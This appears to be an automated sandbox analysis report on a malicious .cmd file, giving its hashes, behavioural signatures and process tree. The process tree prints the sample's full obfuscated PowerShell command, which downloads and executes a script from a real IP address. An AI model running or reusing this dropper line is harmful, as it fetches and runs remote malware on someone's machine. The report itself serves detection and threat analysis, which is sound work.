Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
28/02/2025, 07:11
Static task
static1
Behavioral task
behavioral1
Sample
185.7.214_1.211.cmd
Resource
win7-20240903-en
5 signatures
150 seconds
General
-
Target
185.7.214_1.211.cmd
-
Size
172B
-
MD5
e3f9c42a3eee3a73f89685a8c2cc027e
-
SHA1
9d934754caf36aeb28f239f0011bedc4f68138f5
-
SHA256
2ce52ae9ba8114731368521d8dfdc951e901d13316ebaca8231ab398ae69c85a
-
SHA512
51d8caf7b1dad18417c236660e7c87b7bbf5a96b0bd78166eb3897b995938708767d1ad0e32250dc246d88f40838e228154d7028ecf708e4b54fea7f0fde57a9
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
http://185.7.214.211/a.mp4
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2464 powershell.exe -
pid Process 2464 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2464 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2464 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2376 wrote to memory of 2464 2376 cmd.exe 31 PID 2376 wrote to memory of 2464 2376 cmd.exe 31 PID 2376 wrote to memory of 2464 2376 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\185.7.214_1.211.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$A1='ject Net.WebCli';$B2='loadString(''http://185.7.214.211/a.mp4'')';$C3='ent).Down';$D4='(New-Ob';$E5=IEX ($D4,$A1,$C3,$B2 -Join '')|IEX"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2464
-